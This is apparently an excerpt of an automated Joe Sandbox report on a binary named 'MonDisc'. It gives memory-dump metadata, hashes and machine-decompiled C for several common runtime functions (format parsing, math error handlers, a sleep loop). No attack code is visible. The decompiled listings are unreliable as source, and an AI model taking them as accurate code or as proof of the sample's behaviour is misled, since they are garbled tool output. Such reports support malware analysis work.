                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: 2220e806413afc76e163cbf698f7b7d258190d93046702707facc51bf7b06a9f
                              • Instruction ID: cdfaa6d2db8344b7c44afce7c9311d854bdf8702ccbf84b73afb8ae7eee11ae2
                              • Opcode Fuzzy Hash: 2220e806413afc76e163cbf698f7b7d258190d93046702707facc51bf7b06a9f
                              • Instruction Fuzzy Hash: 5751F827D0CD4645FF22AA38EC5037A6261BF49774F548235E95EB65E2DF3CA4828A02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C901000 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 3115360832-0
                              • Opcode ID: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction ID: 6179a57cf51987d04aed77a4880a1fac33de67376ad0af2380a3bdb4d03797b4
                              • Opcode Fuzzy Hash: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction Fuzzy Hash: 3E313032608B85C6DB65CF15E8802AAB3A5FB88B50F444536DB8D83759DF3CD659CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9D0FB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E00007FF67FF62C9D0FB8(void* __ebx, signed int __ecx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rdi, long long __rsi, long long _a8, long long _a16) {
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;

				_t53 = __rcx;
				_t50 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				if ((__ecx & 0x00000008) == 0) goto 0x2c9d0fea;
				if (sil >= 0) goto 0x2c9d0fea;
				E00007FF67FF62C9D0F1C(__rax, __rcx);
				goto 0x2c9d1041;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0x2c9d1005;
				asm("dec eax");
				if (_t43 >= 0) goto 0x2c9d1005;
				E00007FF67FF62C9D0F1C(__rax, _t53);
				goto 0x2c9d1041;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0x2c9d1021;
				asm("dec eax");
				if (_t44 >= 0) goto 0x2c9d1021;
				E00007FF67FF62C9D0F1C(__rax, _t53);
				goto 0x2c9d1041;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0x2c9d1041;
				asm("dec eax");
				if (_t45 >= 0) goto 0x2c9d1041;
				if ((dil & 0x00000010) == 0) goto 0x2c9d103e;
				E00007FF67FF62C9D0F1C(_t50, _t53);
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0x2c9d105b;
				asm("dec eax");
				if (_t47 >= 0) goto 0x2c9d105b;
				E00007FF67FF62C9D0F1C(_t50, _t53);
				return;
			}







                              0x7ff62c9d0fb8
                              0x7ff62c9d0fb8
                              0x7ff62c9d0fb8
                              0x7ff62c9d0fbd
                              0x7ff62c9d0fd4
                              0x7ff62c9d0fd9
                              0x7ff62c9d0fe0
                              0x7ff62c9d0fe8
                              0x7ff62c9d0fef
                              0x7ff62c9d0ff2
                              0x7ff62c9d0ff4
                              0x7ff62c9d0ff9
                              0x7ff62c9d0ffb
                              0x7ff62c9d1003
                              0x7ff62c9d1005
                              0x7ff62c9d1009
                              0x7ff62c9d100b
                              0x7ff62c9d1010
                              0x7ff62c9d1017
                              0x7ff62c9d101f
                              0x7ff62c9d1021
                              0x7ff62c9d1025
                              0x7ff62c9d1027
                              0x7ff62c9d102c
                              0x7ff62c9d1032
                              0x7ff62c9d1039
                              0x7ff62c9d1041
                              0x7ff62c9d1045
                              0x7ff62c9d1047
                              0x7ff62c9d104c
                              0x7ff62c9d1053
                              0x7ff62c9d1071

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                              • Instruction ID: 7459ce2c7319353957be4084f52fc5ff95697936e9d656c7d1df035a8517fa8d
                              • Opcode Fuzzy Hash: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                              • Instruction Fuzzy Hash: 8A118C73E5CA8381FF643128EE9637910416F5C374E181634EA7EA62D7CE2CA8816647
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98EEF4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E00007FF67FF62C98EEF4(void* __ecx, void* __ebp, signed short __rbx, void* __rcx, signed short __rdi, signed short __rsi, signed short __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _t71;
				signed int _t72;
				intOrPtr _t81;
				void* _t88;
				signed int _t93;
				signed int _t96;
				void* _t103;
				signed int _t108;
				void* _t109;
				signed int _t110;
				signed int _t111;
				void* _t112;
				intOrPtr _t125;
				signed short* _t145;
				signed short* _t146;
				signed short* _t148;
				void* _t150;
				void* _t152;
				signed int* _t165;
				signed short* _t169;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t178;
				signed int* _t179;

				_t152 = __rcx;
				_t145 = _t169;
				_t145[4] = __rbx;
				_t145[8] = __rbp;
				_t145[0xc] = __rsi;
				_t145[0x10] = __rdi;
				_t111 = _t110 | 0xffffffff;
				_t150 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) == __rbp) goto 0x2c98f17a;
				if ( *((intOrPtr*)(__rcx + 0x18)) != __rbp) goto 0x2c98ef43;
				E00007FF67FF62C984D84(_t145);
				 *_t145 = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98f191;
				r12d = 0x20;
				 *((intOrPtr*)(_t150 + 0x478)) =  *((intOrPtr*)(_t150 + 0x478)) + 1;
				_t71 =  *((intOrPtr*)(_t150 + 0x478));
				if (_t71 == 3) goto 0x2c98f18e;
				if (_t71 != 2) goto 0x2c98ef77;
				if ( *((intOrPtr*)(_t150 + 0x47c)) == 1) goto 0x2c98f18e;
				_t146 =  *((intOrPtr*)(_t150 + 0x480));
				_t179 = _t150 + 0x34;
				_t165 = _t150 + 0x38;
				 *((intOrPtr*)(_t150 + 0x47c)) = 0;
				 *(_t150 + 0xde8) = _t111;
				 *(_t150 + 0xdec) = _t111;
				 *_t179 = 0;
				 *_t165 = 0;
				 *(_t150 + 0x18) = _t146;
				 *((intOrPtr*)(_t150 + 0x50)) = 0;
				 *((intOrPtr*)(_t150 + 0x2c)) = 0;
				_t72 =  *_t146 & 0x0000ffff;
				 *(_t150 + 0x42) = _t72;
				if (_t72 == 0) goto 0x2c98f164;
				 *(_t150 + 0x18) =  &(( *(_t150 + 0x18))[1]);
				if ( *((intOrPtr*)(_t150 + 0x28)) < 0) goto 0x2c98f169;
				if (( *(_t150 + 0x42) & 0xffff) - r12w - 0x5a > 0) goto 0x2c98efe4;
				_t147 = _t152 - 0x20;
				goto 0x2c98efe6;
				 *((intOrPtr*)(_t150 + 0x2c)) =  *((intOrPtr*)(0x2ca11bc0 + (_t152 - 0x20) * 8));
				if (E00007FF67FF62C99A65C( *((intOrPtr*)(0x2ca11bc0 + (_t152 - 0x20) * 8)), _t150) == 0) goto 0x2c98f18a;
				_t81 =  *((intOrPtr*)(_t150 + 0x2c));
				if (_t81 == 8) goto 0x2c98f17a;
				_t125 = _t81;
				if (_t125 == 0) goto 0x2c98f144;
				if (_t125 == 0) goto 0x2c98f12f;
				if (_t125 == 0) goto 0x2c98f0ef;
				if (_t125 == 0) goto 0x2c98f0ad;
				if (_t125 == 0) goto 0x2c98f0a6;
				if (_t125 == 0) goto 0x2c98f064;
				if (_t125 == 0) goto 0x2c98f057;
				if (_t81 - 0xfffffffffffffffc != 1) goto 0x2c98f18a;
				_t88 = E00007FF67FF62C9935E8(_t81 - 0xfffffffffffffffc, _t103, 0, _t109, _t111, _t112, 0, _t150, _t150, __rbp, _t178);
				goto 0x2c98f14c;
				E00007FF67FF62C991C34(_t88, _t103, 0, _t150, _t150, _t165);
				goto 0x2c98f14c;
				if ( *(_t150 + 0x42) == 0x2a) goto 0x2c98f07b;
				E00007FF67FF62C98DBB0(_t147, _t150, _t150, _t165, __rdi, _t165, _t175, _t173);
				goto 0x2c98f14c;
				if (E00007FF67FF62C99A018(_t109, _t147, _t150, _t150, _t165, _t172) == 0) goto 0x2c98f18a;
				if ( *((intOrPtr*)(_t150 + 0x478)) != 1) goto 0x2c98f09e;
				if ( *((intOrPtr*)(_t150 + 0x47c)) != 1) goto 0x2c98f150;
				if ( *_t165 >= 0) goto 0x2c98f0eb;
				 *_t165 = _t111;
				goto 0x2c98f0eb;
				 *_t165 = 0;
				goto 0x2c98f150;
				if ( *(_t150 + 0x42) == 0x2a) goto 0x2c98f0bc;
				goto 0x2c98f071;
				if (E00007FF67FF62C999B68(_t109, _t147, _t150, _t150, _t165, _t172) == 0) goto 0x2c98f18a;
				if ( *((intOrPtr*)(_t150 + 0x478)) != 1) goto 0x2c98f0db;
				if ( *((intOrPtr*)(_t150 + 0x47c)) != 1) goto 0x2c98f150;
				_t93 =  *_t179;
				if (_t93 >= 0) goto 0x2c98f0eb;
				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000004;
				 *_t179 =  ~_t93;
				goto 0x2c98f14c;
				_t96 =  *(_t150 + 0x42) & 0x0000ffff;
				if (_t96 == r12w) goto 0x2c98f129;
				if (_t96 == 0x23) goto 0x2c98f123;
				if (_t96 == 0x2b) goto 0x2c98f11d;
				if (_t96 == 0x2d) goto 0x2c98f117;
				if (_t96 != 0x30) goto 0x2c98f150;
				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000008;
				goto 0x2c98f150;
				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000004;
				goto 0x2c98f150;
				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000001;
				goto 0x2c98f150;
				 *(_t150 + 0x30) =  *(_t150 + 0x30) | r12d;
				goto 0x2c98f150;
				 *(_t150 + 0x30) =  *(_t150 + 0x30) | 0x00000002;
				goto 0x2c98f150;
				 *_t179 = 0;
				 *((intOrPtr*)(_t150 + 0x40)) = bpl;
				 *(_t150 + 0x30) = 0;
				 *_t165 = _t111;
				 *((intOrPtr*)(_t150 + 0x3c)) = 0;
				 *((intOrPtr*)(_t150 + 0x54)) = bpl;
				goto 0x2c98f150;
				E00007FF67FF62C990430(_t109, _t150);
				if (1 == 0) goto 0x2c98f18a;
				_t148 =  *(_t150 + 0x18);
				_t108 =  *_t148 & 0x0000ffff;
				 *(_t150 + 0x42) = _t108;
				if (_t108 != 0) goto 0x2c98efb7;
				 *(_t150 + 0x18) =  &(( *(_t150 + 0x18))[1]);
				if (E00007FF67FF62C99AA7C(_t148, _t150) == 0) goto 0x2c98f18a;
				goto 0x2c98ef50;
				E00007FF67FF62C984D84(_t148);
				 *_t148 = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98f191;
				return  *((intOrPtr*)(_t150 + 0x28));
			}




























                              0x7ff62c98eef4
                              0x7ff62c98eef4
                              0x7ff62c98eef7
                              0x7ff62c98eefb
                              0x7ff62c98eeff
                              0x7ff62c98ef03
                              0x7ff62c98ef11
                              0x7ff62c98ef16
                              0x7ff62c98ef20
                              0x7ff62c98ef2a
                              0x7ff62c98ef2c
                              0x7ff62c98ef31
                              0x7ff62c98ef37
                              0x7ff62c98ef3e
                              0x7ff62c98ef43
                              0x7ff62c98ef50
                              0x7ff62c98ef56
                              0x7ff62c98ef5f
                              0x7ff62c98ef68
                              0x7ff62c98ef71
                              0x7ff62c98ef77
                              0x7ff62c98ef7e
                              0x7ff62c98ef82
                              0x7ff62c98ef86
                              0x7ff62c98ef8c
                              0x7ff62c98ef92
                              0x7ff62c98ef98
                              0x7ff62c98ef9b
                              0x7ff62c98ef9d
                              0x7ff62c98efa1
                              0x7ff62c98efa4
                              0x7ff62c98efa7
                              0x7ff62c98efaa
                              0x7ff62c98efb1
                              0x7ff62c98efb7
                              0x7ff62c98efbf
                              0x7ff62c98efd4
                              0x7ff62c98efd6
                              0x7ff62c98efe2
                              0x7ff62c98eff7
                              0x7ff62c98f001
                              0x7ff62c98f007
                              0x7ff62c98f00d
                              0x7ff62c98f013
                              0x7ff62c98f015
                              0x7ff62c98f01e
                              0x7ff62c98f027
                              0x7ff62c98f030
                              0x7ff62c98f035
                              0x7ff62c98f03a
                              0x7ff62c98f03f
                              0x7ff62c98f044
                              0x7ff62c98f04d
                              0x7ff62c98f052
                              0x7ff62c98f05a
                              0x7ff62c98f05f
                              0x7ff62c98f06c
                              0x7ff62c98f071
                              0x7ff62c98f076
                              0x7ff62c98f082
                              0x7ff62c98f08f
                              0x7ff62c98f098
                              0x7ff62c98f0a0
                              0x7ff62c98f0a2
                              0x7ff62c98f0a4
                              0x7ff62c98f0a6
                              0x7ff62c98f0a8
                              0x7ff62c98f0b5
                              0x7ff62c98f0ba
                              0x7ff62c98f0c3
                              0x7ff62c98f0d0
                              0x7ff62c98f0d9
                              0x7ff62c98f0db
                              0x7ff62c98f0e0
                              0x7ff62c98f0e2
                              0x7ff62c98f0e8
                              0x7ff62c98f0ed
                              0x7ff62c98f0ef
                              0x7ff62c98f0f7
                              0x7ff62c98f0fd
                              0x7ff62c98f103
                              0x7ff62c98f109
                              0x7ff62c98f10f
                              0x7ff62c98f111
                              0x7ff62c98f115
                              0x7ff62c98f117
                              0x7ff62c98f11b
                              0x7ff62c98f11d
                              0x7ff62c98f121
                              0x7ff62c98f123
                              0x7ff62c98f127
                              0x7ff62c98f129
                              0x7ff62c98f12d
                              0x7ff62c98f12f
                              0x7ff62c98f132
                              0x7ff62c98f136
                              0x7ff62c98f139
                              0x7ff62c98f13b
                              0x7ff62c98f13e
                              0x7ff62c98f142
                              0x7ff62c98f147
                              0x7ff62c98f14e
                              0x7ff62c98f150
                              0x7ff62c98f154
                              0x7ff62c98f157
                              0x7ff62c98f15e
                              0x7ff62c98f164
                              0x7ff62c98f173
                              0x7ff62c98f175
                              0x7ff62c98f17a
                              0x7ff62c98f17f
                              0x7ff62c98f185
                              0x7ff62c98f18c
                              0x7ff62c98f1af

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: 4ec63f425f504d4985957b1cdca87beaadbf0596afe588d0148998f90385a7bc
                              • Instruction ID: 3b4b2037375902518b116183210ab80c1cdc5c7cb189c0ef7cce0ea0db0534cd
                              • Opcode Fuzzy Hash: 4ec63f425f504d4985957b1cdca87beaadbf0596afe588d0148998f90385a7bc
                              • Instruction Fuzzy Hash: D881AF72D18202CAEF649F25C844A7C37A4EB05BA8F546235CA4DC739ADF3EE541CB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98E108 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E108(intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				signed int _t11;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e15f;
				E00007FF67FF62C984D84(__rax);
				 *__rax = 0x16;
				E00007FF67FF62C9C599C();
				return _t11 | 0xffffffff;
			}




                              0x7ff62c98e108
                              0x7ff62c98e10d
                              0x7ff62c98e112
                              0x7ff62c98e132
                              0x7ff62c98e134
                              0x7ff62c98e139
                              0x7ff62c98e13f
                              0x7ff62c98e15e

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: 1e5db448f25c8a98aa9a74eb4f8bf21431e05364ea239c8b4b33d55978b68cba
                              • Instruction ID: 5ad8be3901c596657a861832007016cdb9c9c343930e9a8b6b4befdaed1da821
                              • Opcode Fuzzy Hash: 1e5db448f25c8a98aa9a74eb4f8bf21431e05364ea239c8b4b33d55978b68cba
                              • Instruction Fuzzy Hash: 5F816476C0C2C68AEF648F25886457C37A9EB16BA8F140236CB49C7797DE39E941C707
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B4268 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$sinh
                              • API String ID: 1156100317-1232919748
                              • Opcode ID: 36117724d7e1ed04c3f67e70320efff5a7a109e9a1e26f1d85601939faa17356
                              • Instruction ID: 96863ef2efd592e5810dae0e48bf683f333171caa9206e294a9473258f34ed97
                              • Opcode Fuzzy Hash: 36117724d7e1ed04c3f67e70320efff5a7a109e9a1e26f1d85601939faa17356
                              • Instruction Fuzzy Hash: 1B919822D28F8588DA63CB34B8513B57358AF663E5F519333E58E71A66DF6CE0838701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B3BAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$acos
                              • API String ID: 1156100317-2870037509
                              • Opcode ID: b6dcec823e4dc5a9c417182350a053a95c54a451be3991cdf5f5124268749f73
                              • Instruction ID: 200d9f966abe40536c337745dca57c5106090a6eb0e15dd5b1ea0ad545c30246
                              • Opcode Fuzzy Hash: b6dcec823e4dc5a9c417182350a053a95c54a451be3991cdf5f5124268749f73
                              • Instruction Fuzzy Hash: 3361B721D2CF4989EA23CB38BC503769754BF663E0F128336E95EB5D65DF2CE0824601
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B3878 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$asin
                              • API String ID: 1156100317-2188059690
                              • Opcode ID: 1ef3dec4585e277179b23e00cc37b891c191b52d688dbad3f81acd93394b27a0
                              • Instruction ID: 99aa8e7254daaaefcacb49d2c4481878b589376aeb11b3cec5154c9c244d9a47
                              • Opcode Fuzzy Hash: 1ef3dec4585e277179b23e00cc37b891c191b52d688dbad3f81acd93394b27a0
                              • Instruction Fuzzy Hash: 7261A821D2CF4989EA13CB38BC51376A354BF963E0F118336E95EB5A65DF2CA0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C916910 Relevance: 6.1, APIs: 4, Instructions: 60sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E00007FF67FF62C916910(void* __edx, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __r14) {
				intOrPtr _t37;
				signed char _t41;
				intOrPtr _t61;
				long _t63;
				long long _t65;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t74;

				 *((long long*)(_t67 + 0x20)) = __rbx;
				_t68 = _t67 - 0x20;
				 *((intOrPtr*)(__rcx + 0x50))();
				Sleep(_t63);
				if ( *((intOrPtr*)(__rcx + 0x90)) != 0) goto 0x2c9169db;
				 *((long long*)(_t68 + 0x30)) = _t65;
				 *((long long*)(_t68 + 0x38)) = __rdi;
				 *((long long*)(_t68 + 0x40)) = __r14;
				r14d = 0x47;
				_t61 =  *__rcx;
				E00007FF67FF62C9EE0B0();
				 *((intOrPtr*)(__rcx + 0x3c)) =  *((intOrPtr*)(__rcx + 0x3c)) + 1;
				_t41 =  *(_t61 + 0x91) & 0x000000ff;
				if ((_t41 & 0x000000e0) != 0) goto 0x2c9169b1;
				_t37 =  *((intOrPtr*)(_t61 + 0xb8));
				if (_t37 < 0) goto 0x2c91697d;
				goto 0x2c91699d;
				if (_t37 != 0xffffffff) goto 0x2c916987;
				goto 0x2c91699d;
				if (_t37 != 0xfffffffe) goto 0x2c916991;
				goto 0x2c91699d;
				_t31 =  ==  ? r14d : 0x4a;
				 *((intOrPtr*)(__rcx + 0x40)) = 0x4a;
				 *(_t61 + 0x91) = _t41 | 0x00000080;
				E00007FF67FF62C8FFCF0( ==  ? r14d : 0x4a, _t37, _t41 | 0x00000080, __rcx, _t61, _t61, _t65, _t70, _t71, __r14, _t74);
				E00007FF67FF62C9EE0B8();
				Sleep(??);
